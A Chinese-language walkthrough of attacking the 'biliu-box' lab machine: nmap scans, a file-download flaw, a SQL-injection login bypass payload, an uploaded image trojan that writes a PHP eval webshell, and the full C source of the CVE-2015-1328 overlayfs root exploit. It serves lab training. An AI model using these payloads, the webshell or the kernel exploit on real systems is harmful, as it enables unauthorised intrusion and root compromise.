针对“biliu-box“ 靶机的 渗透记录

此教程不适合新手小白，你要是说只想知道怎么打通这个靶机那当我没说，个中原理，自行理解。

环境:
靶机在内网不知道IP只知道C段

1.首先扫描存活ip

nmap -sn 192.168.206.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-11 08:08 EDT
Nmap scan report for 192.168.206.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.206.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:E5:40:BD (VMware)
Nmap scan report for 192.168.206.132
Host is up (0.0016s latency).
MAC Address: 00:0C:29:31:59:3D (VMware)
Nmap scan report for 192.168.206.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E3:95:07 (VMware)
Nmap scan report for 192.168.206.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.17 seconds
明显看到这台机子的ip是 206.132  因为129是我的扫描机         
扫描端口:
nmap  192.168.206.132 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-11 08:16 EDT
Nmap scan report for 192.168.206.132
Host is up (0.000060s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:31:59:3D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
开了80 和22 端口

2.利用御剑扫描后台:

 打开这个页面

上面几个页面看起来都很有诱惑力add.php更是让人浮想联翩 以为是什么在数据库增加数据的页面，但是实则，上述页面都没啥用唯独这个test.php是有用的

http://192.168.206.132/test.php

打开会报错 报一个没有file参数的错 然后传参发现他会把这些文件名下载下来 并且不做过滤 任何文件都可以~如果有牛逼的大佬在这里就能够完成渗透了,我只是个小学生所以继续往下做

先把他index.php下载下来看看源码:

他的主页上就写着 让我看看你的sql注入技术 这就是个提示 再看源码 这就过滤了个 ' 把 ' 给替换成空

payload:

un=or 1=1 %23&ps=1\&login=let%27s+login

成功绕过登录

其实到了这里看到上传文件，就可以尝试上传木马了，但是，偶然又获得个字典，遂利用python3 简单扫描一下

import  requests
with open('main.txt','r',encoding='utf-8')as f:
    domlist=f.readlines()
for i in domlist:
    i=i.strip()
    i=f'http://192.168.206.132/{i}'
    s=requests.get(i)
    if s.status_code==200 :
        print(i)

 访问phpmy是phpmyadmin的页面 ,账号密码在之前御剑扫出来的c.php里面就有写 直接下载下来就好了

综上，现在可以绕过后台直接登陆，并且有数据库操作权限，到这一步可以试试写webshell，但是我做的时候,没这么搞

然后继续下载config.inc.php

 发现mysql root账号 ，但是无法通过phpmyadmin登陆

那这个就先放这里吧。

3.回到主页看文件包含部分和上传部分

先看文件包含的部分 他只判断了 按没按continue这个按钮  然后 就你输入啥就包含啥了

文件上传的部分:

包含部分理清楚了 上传图片马就好，简单说下逻辑：
判断全局变量$_FILES['image'] 和 $_FILES['name'] 是否为空，判断file类型的方式就是看后缀jpeg,png,gif,png后缀是这几个就能上传成功,否则他就会告诉你:
i told you dear......

 构造包:

上传成功:

再利用文件包含:

但是因为这个是post文件包含图片马所以菜刀 和 蚁剑都连不到 然后 我换了个思路 先看了看路径 然后写个写入木马的PHP文件重新上传:

此处路径来自刚刚上传的文件然后执行命令pwd和ls 看到的 上传新的小马 成功:

GIF89A
<?php fwrite(fopen("/var/www/uploaded_images/shell.php", "w"),'<?php @eval($_POST[1]);?>');?>

蚁剑  冰蝎 链接成功:

利用蚁剑传冰蝎木马  不传也行无所谓  webshell只要拿到就行

但是数据库依然连不上 显示的是没有权限 然后mysql的配置文件我还没权去看

所以下一步就是提权

4.提权

查看内核版本:

Ubuntu 12.04.5 去找对应exp

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit (exploit-db.com)

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
            

放在upload目录下或者 直接放在 /tmp 目录下 给权限编译执行就好了